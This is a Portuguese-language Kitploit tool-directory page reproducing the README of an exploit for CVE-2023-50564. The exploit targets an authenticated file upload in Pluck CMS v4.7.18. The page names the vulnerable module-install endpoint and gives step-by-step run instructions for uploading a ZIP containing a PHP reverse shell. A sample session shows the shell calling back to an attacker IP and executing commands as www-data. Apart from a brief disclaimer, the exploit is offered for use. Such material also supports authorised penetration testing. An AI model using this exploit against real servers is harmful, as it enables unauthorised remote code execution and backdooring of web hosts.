Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-50564 — Este script explora o recurso de upload de arquivos no Pluck CMS v4.7.18 para enviar um arquivo PHP malicioso, permitindo acesso remoto via shell reverso. Uma vez enviado, este backdoor concede ao atacante acesso ao servidor com permissões de servidor web, permitindo ações adicionais dentro do sistema ou rede. | Kitploit
Ferramentas/GitHubGitHub/mrterrestrial/cve-2023-50564
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubmrterrestrial/cve-2023-50564

CVE-2023-50564

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
11há 1 anoAinda não revisado

Sobre

Este script explora o recurso de upload de arquivos no Pluck CMS v4.7.18 para enviar um arquivo PHP malicioso, permitindo acesso remoto via shell reverso. Uma vez enviado, este backdoor concede ao atacante acesso ao servidor com permissões de servidor web, permitindo ações adicionais dentro do sistema ou rede.

Compartilhar

CVE-2023-50564 - Exploit do Pluck CMS v4.7.18

Visão Geral

Este script explora uma vulnerabilidade de upload arbitrário de arquivo autenticado no Pluck CMS v4.7.18 (CVE-2023-50564). Aproveitando essa vulnerabilidade, um atacante autenticado pode enviar um arquivo PHP malicioso, permitindo a execução de código arbitrário (neste caso, um reverse shell).

Detalhes do Exploit

  • ID CVE: CVE-2023-50564
  • Versão Afetada: Pluck CMS v4.7.18
  • Tipo: Upload Arbitrário de Arquivo Autenticado
  • Impacto: Execução Remota de Código (RCE)

A vulnerabilidade existe no endpoint /admin.php?action=installmodule, que permite que um usuário autenticado envie um arquivo ZIP contendo arquivos arbitrários. Ao enviar um arquivo PHP malicioso, este exploit estabelece um reverse shell de volta ao atacante.

Requisitos

  • Python 3.x
  • Módulo requests: pip install requests
  • Módulo requests-toolbelt: pip install requests-toolbelt

Este script também requer um login válido para a instância do Pluck CMS, incluindo a URL alvo e a senha.

Funcionalidades do Exploit

  • Reverse Shell: O exploit envia um reverse shell PHP para o alvo e se conecta de volta à máquina do atacante.
  • Execução Interativa de Comandos: Uma vez estabelecido o reverse shell, comandos podem ser executados interativamente no alvo.
  • Detecção de Solicitação de Senha: O exploit detecta solicitações de senha (ex.: su, sudo -l) e permite que o usuário forneça entrada manualmente.

Uso

Passos para Executar o Exploit

  1. Clone o Repositório:
    root@kitploit:~
    git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
    cd Pluck-CMS-Exploit
    
  2. Instale os Pacotes Python Necessários: Certifique-se de que os pacotes necessários estão instalados:
root@kitploit:~
pip install requests requests-toolbelt
  1. Execute o Exploit: O script requer quatro entradas: URL alvo, senha do CMS, seu endereço IP (para o reverse shell) e a porta na qual você deseja escutar.

Execute o exploit usando Python:

root@kitploit:~
 python3 exploit.py
  1. Forneça a Entrada Quando Solicitado:
  • Digite a URL alvo (ex.: example.com).
  • Digite a senha para autenticação no CMS.
  • Digite seu endereço IP para a conexão do reverse shell.
  • Digite a porta para escutar o reverse shell.
  1. Shell Interativo: Uma vez estabelecido o reverse shell, você verá um prompt Shell> para interagir com o sistema alvo.

Exemplo:

root@kitploit:~
 $ python3 exploit.py
 Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
 Enter the password for target authentication: password123
 Enter your IP (for reverse shell): 10.10.14.5
 Enter the port to listen on (for reverse shell): 4444
 [*] Autenticando no alvo...
 [+] Autenticação bem-sucedida.
 [*] Gerando arquivo PHP do reverse shell...
 [+] Arquivo PHP do reverse shell criado com sucesso como 'shell.php'.
 [*] Criando payload ZIP...
 [+] Arquivo ZIP criado como 'payload.zip'.
 [*] Iniciando listener do reverse shell em 10.10.14.5:4444 ...
 [*] Enviando payload para o alvo...
 [+] Payload enviado com sucesso.
 [*] Acionando reverse shell em: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
 [+] Conexão recebida de ('10.10.10.1', 55678)
 Shell> whoami
 www-data

Detalhamento do Exploit

  • Autenticação: O script faz login no CMS usando as credenciais fornecidas.
  • Upload de Arquivo: Ele cria um arquivo ZIP contendo um reverse shell PHP e o envia para o endpoint vulnerável (/admin.php?action=installmodule).
  • Reverse Shell: O script aciona o arquivo PHP enviado, estabelecendo uma conexão de reverse shell de volta à máquina do atacante.

Detalhes do CVE

  • ID CVE: CVE-2023-50564
  • Endpoint Vulnerável: /admin.php?action=installmodule
  • Versão Vulnerável: Pluck CMS v4.7.18
  • Tipo: Upload Arbitrário de Arquivo Autenticado

Aviso Legal

Este script é destinado a fins educacionais e hacking ético. Ele deve ser usado apenas em ambientes onde você tenha permissão explícita para testar. O autor não é responsável por qualquer uso indevido desta ferramenta.

Licença

Este projeto está licenciado sob a Licença MIT - veja MIT License para detalhes.

Contribuição

Sinta-se à vontade para fazer um fork do repositório e enviar pull requests. Para quaisquer problemas ou solicitações de funcionalidades, por favor, abra uma issue no GitHub.

Baixar ferramenta